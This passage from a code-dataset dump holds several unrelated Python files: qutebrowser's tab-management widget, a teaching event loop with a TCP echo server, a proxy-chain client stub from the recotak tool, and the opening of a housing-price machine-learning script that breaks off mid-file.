changed.\n cur_link_hovered: Link hovered in current tab (linkHovered)\n cur_scroll_perc_changed: Scroll percentage of current tab changed.\n arg 1: x-position in %.\n arg 2: y-position in %.\n cur_load_status_changed: Loading status of current tab changed.\n close_window: The last tab was closed, close this window.\n resized: Emitted when the browser window has resized, so the completion\n widget can adjust its size to it.\n arg: The new size.\n current_tab_changed: The current tab changed to the emitted WebView.\n \"\"\"\n\n cur_progress = pyqtSignal(int)\n cur_load_started = pyqtSignal()\n cur_load_finished = pyqtSignal(bool)\n cur_statusbar_message = pyqtSignal(str)\n cur_url_text_changed = pyqtSignal(str)\n cur_link_hovered = pyqtSignal(str, str, str)\n cur_scroll_perc_changed = pyqtSignal(int, int)\n cur_load_status_changed = pyqtSignal(str)\n close_window = pyqtSignal()\n resized = pyqtSignal('QRect')\n got_cmd = pyqtSignal(str)\n current_tab_changed = pyqtSignal(webview.WebView)\n\n def __init__(self, win_id, parent=None):\n super().__init__(win_id, parent)\n self._win_id = win_id\n self._tab_insert_idx_left = 0\n self._tab_insert_idx_right = -1\n self.tabCloseRequested.connect(self.on_tab_close_requested)\n self.currentChanged.connect(self.on_current_changed)\n self.cur_load_started.connect(self.on_cur_load_started)\n self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self._undo_stack = []\n self._filter = signalfilter.SignalFilter(win_id, self)\n dispatcher = commands.CommandDispatcher(win_id)\n objreg.register('command-dispatcher', dispatcher, scope='window',\n window=win_id)\n self.destroyed.connect(\n 
functools.partial(objreg.delete, 'command-dispatcher',\n scope='window', window=win_id))\n self._now_focused = None\n # FIXME adjust this to font size\n # https://github.com/The-Compiler/qutebrowser/issues/119\n self.setIconSize(QSize(12, 12))\n objreg.get('config').changed.connect(self.update_favicons)\n\n def __repr__(self):\n return utils.get_repr(self, count=self.count())\n\n def widgets(self):\n \"\"\"Get a list of open tab widgets.\n\n We don't implement this as generator so we can delete tabs while\n iterating over the list.\n \"\"\"\n w = []\n for i in range(self.count()):\n w.append(self.widget(i))\n return w\n\n def _change_app_title(self, text):\n \"\"\"Change the window title based on the tab text.\"\"\"\n if not text:\n title = 'qutebrowser'\n else:\n title = '{} - qutebrowser'.format(text)\n self.window().setWindowTitle(title)\n\n def _connect_tab_signals(self, tab):\n \"\"\"Set up the needed signals for tab.\"\"\"\n page = tab.page()\n frame = page.mainFrame()\n # filtered signals\n tab.linkHovered.connect(\n self._filter.create(self.cur_link_hovered, tab))\n tab.loadProgress.connect(\n self._filter.create(self.cur_progress, tab))\n frame.loadFinished.connect(\n self._filter.create(self.cur_load_finished, tab))\n frame.loadStarted.connect(\n self._filter.create(self.cur_load_started, tab))\n tab.statusBarMessage.connect(\n self._filter.create(self.cur_statusbar_message, tab))\n tab.scroll_pos_changed.connect(\n self._filter.create(self.cur_scroll_perc_changed, tab))\n tab.url_text_changed.connect(\n self._filter.create(self.cur_url_text_changed, tab))\n tab.load_status_changed.connect(\n self._filter.create(self.cur_load_status_changed, tab))\n tab.url_text_changed.connect(\n functools.partial(self.on_url_text_changed, tab))\n # misc\n tab.titleChanged.connect(\n functools.partial(self.on_title_changed, tab))\n tab.iconChanged.connect(\n functools.partial(self.on_icon_changed, tab))\n tab.loadProgress.connect(\n functools.partial(self.on_load_progress, tab))\n frame.loadFinished.connect(\n functools.partial(self.on_load_finished, tab))\n frame.loadStarted.connect(\n functools.partial(self.on_load_started, tab))\n page.windowCloseRequested.connect(\n functools.partial(self.on_window_close_requested, tab))\n\n def current_url(self):\n \"\"\"Get the URL of the current tab.\n\n Intended to be used from command handlers.\n\n Return:\n The current URL as QUrl.\n \"\"\"\n widget = self.currentWidget()\n if widget is None:\n url = QUrl()\n else:\n url = widget.cur_url\n try:\n qtutils.ensure_valid(url)\n except qtutils.QtValueError as e:\n msg = \"Current URL is invalid\"\n if e.reason:\n msg += \" ({})\".format(e.reason)\n msg += \"!\"\n raise cmdexc.CommandError(msg)\n return url\n\n def shutdown(self):\n \"\"\"Try to shut down all tabs cleanly.\"\"\"\n try:\n self.currentChanged.disconnect()\n except TypeError:\n log.destroy.exception(\"Error while shutting down tabs\")\n for tab in self.widgets():\n self._remove_tab(tab)\n\n def close_tab(self, tab):\n \"\"\"Close a tab.\n\n Args:\n tab: The QWebView to be closed.\n \"\"\"\n last_close = config.get('tabs', 'last-close')\n if self.count() > 1:\n self._remove_tab(tab)\n elif last_close == 'close':\n self._remove_tab(tab)\n self.close_window.emit()\n elif last_close == 'blank':\n tab.openurl(QUrl('about:blank'))\n\n def _remove_tab(self, tab):\n \"\"\"Remove a tab from the tab list and delete it properly.\n\n Args:\n tab: The QWebView to be closed.\n \"\"\"\n idx = self.indexOf(tab)\n if idx == -1:\n raise ValueError(\"tab {} is 
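# --- Editor's sketch: the functools.partial idiom from the record above. ---
# Each per-tab slot is bound to its tab with functools.partial so one handler
# serves every tab. The same trick without Qt (names are illustrative):
import functools

def on_title_changed(tab, text):
    print(f"tab {tab}: title -> {text!r}")

handlers = {tab: functools.partial(on_title_changed, tab) for tab in ("t1", "t2")}
handlers["t1"]("hello")     # prints: tab t1: title -> 'hello'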
not contained in TabbedWidget!\".format(\n tab))\n if tab is self._now_focused:\n self._now_focused = None\n if tab is objreg.get('last-focused-tab', None, scope='window',\n window=self._win_id):\n objreg.delete('last-focused-tab', scope='window',\n window=self._win_id)\n if tab.cur_url.isValid():\n history_data = qtutils.serialize(tab.history())\n entry = UndoEntry(tab.cur_url, history_data)\n self._undo_stack.append(entry)\n elif tab.cur_url.isEmpty():\n # There are some good reasons why an URL could be empty\n # (target=\"_blank\" with a download, see [1]), so we silently ignore\n # this.\n # [1] https://github.com/The-Compiler/qutebrowser/issues/163\n pass\n else:\n # We display a warnings for URLs which are not empty but invalid -\n # but we don't return here because we want the tab to close either\n # way.\n urlutils.invalid_url_error(self._win_id, tab.cur_url, \"saving tab\")\n tab.shutdown()\n self.removeTab(idx)\n tab.deleteLater()\n\n def undo(self):\n \"\"\"Undo removing of a tab.\"\"\"\n url, history_data = self._undo_stack.pop()\n newtab = self.tabopen(url)\n qtutils.deserialize(history_data, newtab.history())\n\n @pyqtSlot('QUrl', bool)\n def openurl(self, url, newtab):\n \"\"\"Open a URL, used as a slot.\n\n Args:\n url: The URL to open as QUrl.\n newtab: True to open URL in a new tab, False otherwise.\n \"\"\"\n qtutils.ensure_valid(url)\n if newtab:\n self.tabopen(url, background=False)\n else:\n self.currentWidget().openurl(url)\n\n @pyqtSlot(int)\n def on_tab_close_requested(self, idx):\n \"\"\"Close a tab via an index.\"\"\"\n tab = self.widget(idx)\n if tab is None:\n log.webview.debug(\"Got invalid tab {} for index {}!\".format(\n tab, idx))\n return\n self.close_tab(tab)\n\n @pyqtSlot(webview.WebView)\n def on_window_close_requested(self, widget):\n \"\"\"Close a tab with a widget given.\"\"\"\n self.close_tab(widget)\n\n @pyqtSlot('QUrl', bool)\n def tabopen(self, url=None, background=None, explicit=False):\n \"\"\"Open a new tab with a given URL.\n\n Inner logic for open-tab and open-tab-bg.\n Also connect all the signals we need to _filter_signals.\n\n Args:\n url: The URL to open as QUrl or None for an empty tab.\n background: Whether to open the tab in the background.\n if None, the background-tabs setting decides.\n explicit: Whether the tab was opened explicitely.\n If this is set, the new position might be different. With\n the default settings we handle it like Chromium does:\n - Tabs from clicked links etc. 
are to the right of\n the current.\n - Explicitely opened tabs are at the very right.\n\n Return:\n The opened WebView instance.\n \"\"\"\n if url is not None:\n qtutils.ensure_valid(url)\n log.webview.debug(\"Creating new tab with URL {}\".format(url))\n if config.get('tabs', 'tabs-are-windows') and self.count() > 0:\n from qutebrowser.mainwindow import mainwindow\n window = mainwindow.MainWindow.spawn()\n tabbed_browser = objreg.get('tabbed-browser', scope='window',\n window=window)\n return tabbed_browser.tabopen(url, background, explicit)\n tab = webview.WebView(self._win_id, self)\n self._connect_tab_signals(tab)\n idx = self._get_new_tab_idx(explicit)\n self.insertTab(idx, tab, \"\")\n if url is not None:\n tab.openurl(url)\n if background is None:\n background = config.get('tabs', 'background-tabs')\n if not background:\n self.setCurrentWidget(tab)\n tab.show()\n return tab\n\n def _get_new_tab_idx(self, explicit):\n \"\"\"Get the index of a tab to insert.\n\n Args:\n explicit: Whether the tab was opened explicitely.\n\n Return:\n The index of the new tab.\n \"\"\"\n if explicit:\n pos = config.get('tabs', 'new-tab-position-explicit')\n else:\n pos = config.get('tabs', 'new-tab-position')\n if pos == 'left':\n idx = self._tab_insert_idx_left\n # On first sight, we'd think we have to decrement\n # self._tab_insert_idx_left here, as we want the next tab to be\n # *before* the one we just opened. However, since we opened a tab\n # *to the left* of the currently focused tab, indices will shift by\n # 1 automatically.\n elif pos == 'right':\n idx = self._tab_insert_idx_right\n self._tab_insert_idx_right += 1\n elif pos == 'first':\n idx = 0\n elif pos == 'last':\n idx = -1\n else:\n raise ValueError(\"Invalid new-tab-position '{}'.\".format(pos))\n log.webview.debug(\"new-tab-position {} -> opening new tab at {}, \"\n \"next left: {} / right: {}\".format(\n pos, idx, self._tab_insert_idx_left,\n self._tab_insert_idx_right))\n return idx\n\n @pyqtSlot(str, int)\n def search(self, text, flags):\n \"\"\"Search for text in the current page.\n\n Args:\n text: The text to search for.\n flags: The QWebPage::FindFlags.\n \"\"\"\n log.webview.debug(\"Searching with text '{}' and flags \"\n \"0x{:04x}.\".format(text, int(flags)))\n widget = self.currentWidget()\n old_scroll_pos = widget.scroll_pos\n found = widget.findText(text, flags)\n if not found and not flags & QWebPage.HighlightAllOccurrences and text:\n message.error(self._win_id, \"Text '{}' not found on \"\n \"page!\".format(text), immediately=True)\n else:\n backward = int(flags) & QWebPage.FindBackward\n\n def check_scroll_pos():\n \"\"\"Check if the scroll position got smaller and show info.\"\"\"\n if not backward and widget.scroll_pos < old_scroll_pos:\n message.info(self._win_id, \"Search hit BOTTOM, continuing \"\n \"at TOP\", immediately=True)\n elif backward and widget.scroll_pos > old_scroll_pos:\n message.info(self._win_id, \"Search hit TOP, continuing at \"\n \"BOTTOM\", immediately=True)\n # We first want QWebPage to refresh.\n QTimer.singleShot(0, check_scroll_pos)\n\n @config.change_filter('tabs', 'show-favicons')\n def update_favicons(self):\n \"\"\"Update favicons when config was changed.\"\"\"\n show = config.get('tabs', 'show-favicons')\n for i, tab in enumerate(self.widgets()):\n if show:\n self.setTabIcon(i, tab.icon())\n else:\n self.setTabIcon(i, QIcon())\n\n @pyqtSlot()\n def on_load_started(self, tab):\n \"\"\"Clear icon when a tab started loading.\n\n Args:\n tab: The tab where the signal belongs to.\n \"\"\"\n 
try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if idx == -1:\n # We can get signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n self.setTabIcon(idx, QIcon())\n\n @pyqtSlot()\n def on_cur_load_started(self):\n \"\"\"Leave insert/hint mode when loading started.\"\"\"\n modeman.maybe_leave(self._win_id, usertypes.KeyMode.insert,\n 'load started')\n modeman.maybe_leave(self._win_id, usertypes.KeyMode.hint,\n 'load started')\n\n @pyqtSlot(webview.WebView, str)\n def on_title_changed(self, tab, text):\n \"\"\"Set the title of a tab.\n\n Slot for the titleChanged signal of any tab.\n\n Args:\n tab: The WebView where the title was changed.\n text: The text to set.\n \"\"\"\n if not text:\n log.webview.debug(\"Ignoring title change to '{}'.\".format(text))\n return\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n log.webview.debug(\"Changing title for idx {} to '{}'\".format(\n idx, text))\n if idx == -1:\n # We can get signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n self.setTabText(idx, text.replace('&', '&&'))\n if idx == self.currentIndex():\n self._change_app_title(text)\n\n @pyqtSlot(webview.WebView, str)\n def on_url_text_changed(self, tab, url):\n \"\"\"Set the new URL as title if there's no title yet.\n\n Args:\n tab: The WebView where the title was changed.\n url: The new URL.\n \"\"\"\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if idx == -1:\n # We can get signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n if not self.tabText(idx):\n self.setTabText(idx, url)\n\n @pyqtSlot(webview.WebView)\n def on_icon_changed(self, tab):\n \"\"\"Set the icon of a tab.\n\n Slot for the iconChanged signal of any tab.\n\n Args:\n tab: The WebView where the title was changed.\n \"\"\"\n if not config.get('tabs', 'show-favicons'):\n return\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if idx == -1:\n # We can get *_changed signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n self.setTabIcon(idx, tab.icon())\n\n @pyqtSlot(usertypes.KeyMode)\n def on_mode_left(self, mode):\n \"\"\"Give focus to current tab if command mode was left.\"\"\"\n if mode == usertypes.KeyMode.command:\n widget = self.currentWidget()\n log.modes.debug(\"Left command mode, focusing {!r}\".format(widget))\n if widget is None:\n return\n widget.setFocus()\n\n @pyqtSlot(int)\n def on_current_changed(self, idx):\n \"\"\"Set last-focused-tab and leave hinting mode when focus changed.\"\"\"\n if idx == -1:\n # closing the last tab (before quitting)\n return\n tab = self.widget(idx)\n log.modes.debug(\"Current tab changed, focusing {!r}\".format(tab))\n tab.setFocus()\n for mode in (usertypes.KeyMode.hint, usertypes.KeyMode.insert):\n modeman.maybe_leave(self._win_id, mode, 'tab changed')\n if self._now_focused is not None:\n objreg.register('last-focused-tab', self._now_focused, update=True,\n scope='window', window=self._win_id)\n self._now_focused = tab\n self.current_tab_changed.emit(tab)\n self._change_app_title(self.tabText(idx))\n self._tab_insert_idx_left = self.currentIndex()\n self._tab_insert_idx_right = 
self.currentIndex() + 1\n\n @pyqtSlot()\n def on_cmd_return_pressed(self):\n \"\"\"Set focus when the commandline closes.\"\"\"\n log.modes.debug(\"Commandline closed, focusing {!r}\".format(self))\n\n def on_load_progress(self, tab, perc):\n \"\"\"Adjust tab indicator on load progress.\"\"\"\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n start = config.get('colors', 'tabs.indicator.start')\n stop = config.get('colors', 'tabs.indicator.stop')\n system = config.get('colors', 'tabs.indicator.system')\n color = utils.interpolate_color(start, stop, perc, system)\n self.tabBar().set_tab_indicator_color(idx, color)\n\n def on_load_finished(self, tab):\n \"\"\"Adjust tab indicator when loading finished.\n\n We don't take loadFinished's ok argument here as it always seems to be\n true when the QWebPage has an ErrorPageExtension implemented.\n See https://github.com/The-Compiler/qutebrowser/issues/84\n \"\"\"\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if tab.page().error_occured:\n color = config.get('colors', 'tabs.indicator.error')\n else:\n start = config.get('colors', 'tabs.indicator.start')\n stop = config.get('colors', 'tabs.indicator.stop')\n system = config.get('colors', 'tabs.indicator.system')\n color = utils.interpolate_color(start, stop, 100, system)\n self.tabBar().set_tab_indicator_color(idx, color)\n\n def resizeEvent(self, e):\n \"\"\"Extend resizeEvent of QWidget to emit a resized signal afterwards.\n\n Args:\n e: The QResizeEvent\n \"\"\"\n super().resizeEvent(e)\n self.resized.emit(self.geometry())\n","sub_path":"qutebrowser-git/pkg/qutebrowser-git/usr/lib/python3.4/site-packages/qutebrowser/mainwindow/tabbedbrowser.py","file_name":"tabbedbrowser.py","file_ext":"py","file_size_in_byte":22723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"354901682","text":"import socket\nfrom collections import deque\nfrom typing import Any, Coroutine\nfrom inspect import iscoroutine\nfrom selectors import DefaultSelector, EVENT_READ, EVENT_WRITE\n\n\nclass EventLoopException(Exception):\n pass\n\n\nclass Future:\n def __init__(self):\n self.future_result = None\n\n def set_result(self, result: Any):\n if self.future_result is not None:\n raise EventLoopException('Object future already resolved')\n\n self.future_result = result\n\n def done(self):\n return self.future_result is None\n\n def result(self):\n if self.future_result is None:\n raise EventLoopException('Result is not set')\n\n return self.future_result\n\n\nclass Task(Future):\n def __init__(self, coro: Coroutine):\n super().__init__()\n\n if not iscoroutine(coro):\n raise EventLoopException('Object coro is not native coroutine')\n\n self.coro = coro\n\n\nclass EventLoop:\n def __init__(self):\n self.selector = DefaultSelector()\n self.tasks = []\n\n def create_task(self, coro: Coroutine):\n task = Task(coro)\n self.tasks.append(task)\n\n def run_forever(self):\n if not self.tasks:\n raise EventLoopException('There are no tasks for running')\n\n\nclass EventLoopExample:\n \"\"\"\n Событийный цикл, который использует очередь с двухсторонним доступом\n Цикл опрашивает селектор на предмет готовности событий для чтения и записи\n в сокет\n \"\"\"\n def __init__(self):\n \"\"\"\n Конструктор событийного цикла, который хранит очередь\n :return:\n \"\"\"\n self.ready = deque()\n self.selector = DefaultSelector()\n self.current_task = 
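# --- Editor's note: hedged stand-in for utils.interpolate_color used above. ---
# The tab indicator fades from a start to a stop colour as loadProgress goes
# 0..100; a plain linear RGB interpolation captures the idea:
def interpolate_rgb(start, stop, perc):
    """Blend two (r, g, b) tuples; perc runs from 0 to 100."""
    t = max(0, min(100, perc)) / 100
    return tuple(round(a + (b - a) * t) for a, b in zip(start, stop))

# interpolate_rgb((0, 0, 0), (0, 255, 0), 50) == (0, 128, 0)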
None\n\n def read_wait(self, sock):\n yield 'read_wait', sock\n\n def write_wait(self, sock):\n yield 'write_wait', sock\n\n async def sock_recv(self, sock, max_bytes: int):\n \"\"\"\n курутина для чтения данных из сокета в асинхронный способ\n :param sock: дескриптор сокета\n :param max_bytes: максимальное количество байт, которые могут быть\n прочитаны за один раз без блокировки\n :return: принятые из сокета данные в банарном виде\n \"\"\"\n await self.read_wait(sock)\n return sock.recv(max_bytes)\n\n async def sock_accept(self, sock):\n await self.read_wait(sock)\n return sock.accept()\n\n async def sock_sendall(self, sock, data):\n while data:\n try:\n n_sent = sock.send(data)\n data = data[n_sent:]\n except BlockingIOError:\n await self.write_wait(sock)\n\n def create_task(self, coro):\n self.ready.append(coro)\n\n def run_forever(self):\n while True:\n while not self.ready:\n events = self.selector.select()\n for key, _ in events:\n self.ready.append(key.data)\n self.selector.unregister(key.fileobj)\n\n while self.ready:\n self.current_task = self.ready.popleft()\n try:\n # запускаем генератор до появления yield\n op, *args = self.current_task.send(None)\n getattr(self, op)(*args)\n except StopIteration:\n pass\n\n def read_wait(self, sock):\n self.selector.register(sock, EVENT_READ, self.current_task)\n\n def write_wait(self, sock):\n self.selector.register(sock, EVENT_WRITE, self.current_task)\n\n\nasync def echo_handler(client_sock, loop):\n\n # дескриптор сокета поддерживает менеджер контекстов\n with client_sock:\n while True:\n # читаем данные асинхронно по 1024 байт\n data = await loop.sock_recv(client_sock, 1024)\n\n print(str.format('[~] Client send: {}', data.decode()))\n\n # признак завершения передачи данных от клиента None при\n # socket.recv()\n if not data or 'bye' in data.decode():\n break\n\n # отправляем данные асинхронно в клиентское соединение\n await loop.sock_sendall(client_sock, b'Got: ' + data)\n\n print('[~] Client connection closed')\n\n\nasync def echo_tcp_server(address: tuple, loop: EventLoop):\n sock = socket.socket()\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(address)\n sock.listen(5)\n sock.setblocking(False)\n\n print(str.format('[~] TCP echo server is running on: {}:{}', *address))\n\n while True:\n client_sock, client_address = await loop.sock_accept(sock)\n print(str.format(\n '[~] Connection from: {}', client_address\n ))\n\n # добавляем в событийный цикл задачу по обработке клиентского\n # подключения в событийном цикле loop\n loop.create_task(echo_handler(client_sock, loop))\n\n\ndef main():\n address = ('', 25000)\n\n # создаем экземпляр событийного цикла\n loop = EventLoopExample()\n\n # сервер представлен курутиной, которую необходимо добавить в событийный\n # цикл; метод возвращает объе��т класса Task\n loop.create_task(echo_tcp_server(address, loop))\n\n # запускаем событийный цикл на бесконечное выполнение\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n print('[!] 
Pressed Ctrl + C')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"spl/selectors_module/event_loop.py","file_name":"event_loop.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"377233692","text":"\"\"\"\na stub for remote proxy\n# Copyright (c) 2014, curesec GmbH\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this list of\n# conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice, this list\n# of conditions and the following disclaimer in the documentation and/or other materials\n# provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific prior written\n# permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS\n# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nA proxy is used in order to forward plugins' traffic through it. They are\norganised in chains, so the traffice flows through a list of proxies.\n\n\"\"\"\n\nimport reco_client.connection.comm as comm\n#from reco_client.connection.comm import comm.sendpacket\n#from reco_client.connection.comm import comm.ccdlib\n\nimport logging\nlogger = logging.getLogger(\"client.%s\" % __name__)\n\nclass Proxy():\n \"\"\"\n A proxy is an object that is assigned to a proxy chain. 
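# --- Editor's aside: a hedged miniature of the trampoline in event_loop.py. ---
# The loop above drives coroutines by catching ('read_wait', sock) /
# ('write_wait', sock) requests yielded from awaited helpers and dispatching
# them by name via getattr. The suspension mechanism in isolation:
import types

@types.coroutine
def request(op, arg):
    yield op, arg              # suspend until the loop resumes this task

async def task():
    print("asking")
    await request("read_wait", "sock-A")
    print("resumed")

t = task()
op, arg = t.send(None)         # -> ('read_wait', 'sock-A')
print("loop would call", op, "on", arg)
try:
    t.send(None)               # resume; the coroutine then finishes
except StopIteration:
    pass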
class Proxy():\n    \"\"\"\n    A proxy is an object that is assigned to a proxy chain. Every proxy has an\n    address and a protocol that is spoken.\n\n    A proxy has the following attributes:\n\n        pxid            id of the proxy\n        ip              ip or domain the proxy listens to\n        port            port the proxy listens to\n        protocol        the protocol the proxy is addressable with (at the moment\n                        only s4 supported)\n        description     some descriptive words\n\n    \"\"\"\n\n    def __init__(self, pxid, ip, port, protocol, description):\n        \"\"\" create a new proxy object without adding it to database \"\"\"\n        self.pxid = pxid\n        self.ip = ip\n        self.port = port\n        self.protocol = protocol\n        self.description = description\n\n    def __str__(self):\n        res = \"\\t%s (%s) - \" % (self.pxid, self.description)\n        res += \"%s://\" % self.protocol\n        res += \"%s:%d\" % (self.ip, self.port)\n\n        return res\n\ndef new_proxy(client, protocol, ip, port, description):\n    \"\"\"\n    create a new proxy\n\n    input:\n        protocol    protocol the proxy is addressable with\n        ip          ip or domain of the proxy\n        port        port the proxy listens to\n        description short description of the proxy\n\n    output:\n        proxy id\n\n    \"\"\"\n    try:\n        pld = dict(ip=ip,\n                   port=port,\n                   protocol=protocol,\n                   description=description)\n    except (KeyError, ValueError):\n        return (\"Invalid input. Example: new proxy protocol://\"\n                \"ip:port proxy_name\")\n\n    # send request\n    resp_t = comm.sendpacket(client, op=comm.ccdlib.OP_NEWPROXY, pld=pld)\n\n    # create proxy object\n    proxy = Proxy(pxid=resp_t[-1], **pld)\n\n    # cache\n    client.proxies[proxy.pxid] = proxy\n\n    return proxy.pxid\n\ndef del_proxy(client, proxyid):\n    \"\"\"\n    delete proxy\n\n    input:\n        proxyid     id of the proxy\n\n    output:\n        payload of server response\n\n    \"\"\"\n\n    # build request\n    if proxyid not in client.proxies:\n        raise KeyError()\n    pld = dict(pxid=proxyid)\n\n    # send request\n    resp_t = comm.sendpacket(client, op=comm.ccdlib.OP_DELPROXY, pld=pld)\n\n    # delete from cache\n    del client.proxies[pld[\"pxid\"]]\n\n    return resp_t[-1]\n\ndef print_proxies(client):\n    \"\"\" show proxies \"\"\"\n\n    updateProxyList(client)\n\n    for proxy in client.proxies.values():\n        print(str(proxy))\n\ndef updateProxyList(client):\n    \"\"\" ask server for configured proxies \"\"\"\n    resp_t = comm.sendpacket(client, op=comm.ccdlib.OP_SHOWPROXY)\n\n    for p in resp_t[-1]:\n        try:\n            proxy = Proxy(pxid=p[\"pxid\"],\n                          ip=p[\"ip\"],\n                          port=int(p[\"port\"]),\n                          protocol=p[\"protocol\"],\n                          description=p[\"description\"])\n            client.proxies[proxy.pxid] = proxy\n        except (KeyError, ValueError):\n            logger.warning(\"Received invalid json packet!\")\n","sub_path":"recotak/reco_client/reco_client/remote/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178251240","text":"\"\"\"\nThe dataset in this directory is almost identical to the original but:\n\n* 207 values were randomly removed from the `total_bedrooms` column\n  so we can discuss what to do with missing data.\n* An additional categorical attribute called `ocean_proximity` was added\n  indicating (very roughly) whether each block group is near the ocean\n  near the Bay area, inland or on an island.\n  > This allows discussing what to do with categorical data.\n\nNote that the block groups are called \"districts\" simply because in\nsome contexts the name \"block group\" was confusing.\n\nIt is clearly a typical supervised learning task seeing the given labeled\ntraining examples (each instance comes with the expected output, i.e.,\nthe district’s median housing price). 
Moreover, it is also a typical regression\ntask, since you are asked to predict a value. More specifically, this is a\nmultivariate regression problem since the system will use multiple features to\nmake a prediction (it will use the district’s population, the median income,\netc.) Finally, since there is no continuous flow of data coming in the system,\nthere is no particular need to adjust to changing data rapidly, and the data\nis small enough to fit in memory, so plain batch learning is considered.\n\"\"\"\n\nimport hashlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport pprint\nfrom pandas.tools.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split, StratifiedShuffleSplit\nfrom sklearn.preprocessing import Imputer, LabelEncoder, OneHotEncoder,\\\n LabelBinarizer, StandardScaler\nfrom sklearn.pipeline import Pipeline, FeatureUnion\n\npd.set_option('display.max_column', None)\n\nDATASET_PATH = '../resources/'\n\ndef load_data(path_str):\n \"\"\" Return dataset\n\n Read CSV file containing dataset and return pandas DataFrame\n \"\"\"\n path = os.path.join(path_str, 'housing.csv')\n \n return pd.read_csv(path)\n\ndef split_data(data, test_percent, use_seed):\n \"\"\" Return test & train sub-datasets\n\n Avoid data snooping bias, split dataset in train & test sub-datasets.\n \"\"\"\n if use_seed == True:\n np.random.seed(42)\n rand_idx = np.random.permutation(len(data))\n arr_size = int(len(data) * test_percent)\n test_idx = rand_idx[:arr_size]\n train_idx = rand_idx[arr_size:]\n \n return data.iloc[train_idx], data.iloc[test_idx]\n\ndef test_set_check(id, test_percent, hash):\n \"\"\" Obtain data from only new rows\n\n Put an instance in the test set if the computed hash value is lower or equal to\n 51 (~20% of 256)\n \"\"\"\n\n return hash(np.int64(id)).digest()[-1] < 256 * test_percent\n\ndef split_data_hash(data, test_percent, id_col, hash=hashlib.md5):\n \"\"\" Return test & train sub-datasets\n\n Avoid data snooping bias, split dataset in train & test sub-datasets.\n \"\"\"\n id_list = data[id_col]\n in_test = id_list.apply(lambda id_: test_set_check(id_, test_percent, hash))\n\n return data.loc[~in_test], data.loc[in_test]\n\ndef main():\n \"\"\"------------------------------------------------------------------------\"\"\"\n data = load_data(DATASET_PATH)\n #train_data, test_data = split_data(data, 0.2, True)\n \n data_id = data.reset_index() # Add an 'index' column\n train_data, test_data = split_data_hash(data_id, 0.2, 'index')\n\n #data_id['id'] = data['longitude'] * 1000 + data['latitude']\n #train_data, test_data = split_data_hash(data_id, 0.2, 'id')\n\n train_data, test_data = train_test_split(data, test_size=0.2, random_state=42)\n\n data['income_cat'] = np.ceil(data['median_income'] / 1.5)\n data['income_cat'].where(data['income_cat'] < 5, 5.0, inplace=True)\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2,\n random_state=42)\n for train_ind, test_ind in split.split(data, data['income_cat']):\n strat_train_data = data.loc[train_ind]\n strat_test_data = data.loc[test_ind]\n\n for set in (strat_train_data, strat_test_data):\n set.drop(['income_cat'], axis=1, inplace=True)\n\n # Make a copy of the training data\n data = strat_train_data.copy()\n \n # s=radius, c=color\n \"\"\"\n data.plot(kind='scatter', x='longitude', y='latitude', alpha=0.4,\n s=data['population']/100, label='population', c='median_house_value',\n cmap=plt.get_cmap('jet'), colorbar=True)\n plt.show()\n plt.legend()\n 
